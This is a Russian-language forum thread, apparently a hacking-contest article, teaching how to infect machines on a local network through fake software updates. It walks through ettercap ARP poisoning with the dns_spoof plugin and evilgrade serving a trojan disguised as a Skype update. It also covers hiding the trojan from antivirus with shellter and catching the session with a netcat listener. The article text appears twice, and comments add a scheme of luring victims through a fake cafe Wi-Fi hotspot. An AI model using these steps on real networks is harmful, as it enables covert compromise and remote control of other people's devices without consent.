Конкурс Заражение сети через обновление

Статья для участия в конкурсе на codeby​

Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.

• Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es - (Windows software)
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • more...

Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

Узнали? Отлично, идем редачить файл конфигурации ettercap:

leafpad /etc/ettercap/etter.dns

2.png

и запускаем инструмент : ettercap -G

3.png

Sniff -->Unified Sniffing

Plugins -->Manage Plugins -->dns_spoof

4.png

Hosts --> scan hosts

Чтобы увидеть список машин в сети Hosts -> Hosts list

5.png

( по МАС-ам можете не стараться меня пробить)

Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

и :

7.png

8.png

Отложим пока ettercap, настроим evilgrade до конца.

Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

"вернемся к нашим баранам" Жванецкий

evilgrade > configure skype

10.png

evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe <<-
настраиваем фэйк обновку)

evilgrade (skype) > start

Запускаем ettercap :

11.png

и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

nc -l -p 4444

и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))

Screenshot_1.png

как то так.))

PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

Удачи..)

Слышала что подобным методом было заражено сеть атомной станции. Этот метод очень сильный! Так как можно заразить все что хочешь, от пк к андроиду.
Вот мой пример как прятаться от АнтиВирусника

Последнее редактирование модератором:
Слышала что подобным методом было заражено сеть атомной станции
Ну не атомной станции, а предприятия по обогащению урана. Потом сеть там была локальная, заражение произошло через съёмный носитель.

• Нравится
Реакции: Vertigo
Как устанавливается evilgrade? Ни слова на гите не нашёл.

Способ действительно отличный)
Нужно как-нибудь обязательно опробовать.

Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:

upload_2017-11-7_16-8-28.png

Вложения

• upload_2017-11-7_16-8-5.png
    upload_2017-11-7_16-8-5.png
    47,8 КБ · Просмотры: 224
Последнее редактирование:
Мое почтение, автор. Это уже даже не технические навыки.. Это тех.скилзы + творчество. Побольше бы таких творцов, любящих делиться информацией!

Кстати, такая возможность реализована в intercepter-ng 1.0:

Посмотреть вложение 12668
так интерцептер же только в LAN работает? или я ошибаюсь?

В основном, да. Но для некоторых целей можно заставить и в сеть смотреть
Я понял в чём соль, начал искать по поиску, статью: "Обходим NAT", а я её перенесли в серую секцию уже по ходу, да? Я прав? В эту сторону надо же копать? Короче надо срочно оформлять подписку на год)

• Нравится
Реакции: ghost
Статья для участия в конкурсе на codeby​

Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.

• Freerip 3.30
    Jet photo 4.7.2
    Teamviewer 5.1.9385
    ISOpen 4.5.0
    Istat.
    Gom 2.1.25.5015
    Atube catcher 1.0.300
    Vidbox 7.5
    Ccleaner 2.30.1130
    Fcleaner 1.2.9.409
    Allmynotes 1.26
    Notepad++ 5.8.2
    Java 1.6.0_22 winxp/win7
    aMSN 0.98.3
    Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
    Mirc 7.14
    Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft works)
    Dap 9.5.0.3
    Winscp 4.2.9
    AutoIt Script 3.3.6.1
    Clamwin 0.96.0.1
    AppTapp Installer 3.11 (Iphone/Itunes)
    getjar (facebook.com)
    Google Analytics Javascript injection
    Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
    Winamp 5.581
    TechTracker (cnet) 1.3.1 (Build 55)
    Nokiasoftware firmware update 2.4.8es - (Windows software)
    Nokia firmware v20.2.011
    BSplayer 2.53.1034
    Apt ( < Ubuntu 10.04 LTS)
    Ubertwitter 4.6 (0.971)
    Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
    Cpan 1.9402
    VirtualBox (3.2.8 )
    Express talk
    Filezilla
    Flashget
    Miranda
    Orbit
    Photoscape.
    Panda Antirootkit
    Superantispyware
    Trillian <= 5.0.0.26
    Adium 1.3.10 (Sparkle Framework)
    VMware
    more...

Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap

как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.

Узнали? Отлично, идем редачить файл конфигурации ettercap:

leafpad /etc/ettercap/etter.dns

Посмотреть вложение 12563

и запускаем инструмент : ettercap -G

Посмотреть вложение 12564

Sniff -->Unified Sniffing

Plugins -->Manage Plugins -->dns_spoof

Посмотреть вложение 12565

Hosts --> scan hosts

Чтобы увидеть список машин в сети Hosts -> Hosts list

Посмотреть вложение 12566

( по МАС-ам можете не стараться меня пробить)

Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.

и :

Посмотреть вложение 12567

Посмотреть вложение 12568
Отложим пока ettercap, настроим evilgrade до конца.

Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.

"вернемся к нашим баранам" Жванецкий

evilgrade > configure skype

Посмотреть вложение 12569

evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe <<-
настраиваем фэйк обновку)

evilgrade (skype) > start

Запускаем ettercap :

Посмотреть вложение 12570

и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!

nc -l -p 4444

и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))

Посмотреть вложение 12572

как то так.))

PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)

Удачи..)
Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl

Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.

По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
[doublepost=1510237121,1510232551][/doublepost]Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.

Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl

Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.

По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
[doublepost=1510237121,1510232551][/doublepost]Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
Тоже хотел это написать, но ты меня опередил.

Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность

Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность
вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!

вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!
Вы совершенно правы , учитывая то что в Снг (и не только) могут упаковать лишь за комментарий , то что уж и говорить о наших методах) К тому же кощунство выкладывать новичкам уязвимости , над которыми работаешь порой продолжительное время . Хотя мне жаль начинающих ребят , слишком большой порог вхождения сейчас и они бывают разочаровываются видя лишь методики в открытом доступе , которые блокируются всем чем можно уже на стадии выходи эксплойта .

• Нравится
Реакции: Kalina и Ondrik8
Огненная статья! Как раз в тему зашла, надеюсь что в поле она отработает себя на 100%. Спасибо за труды!

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!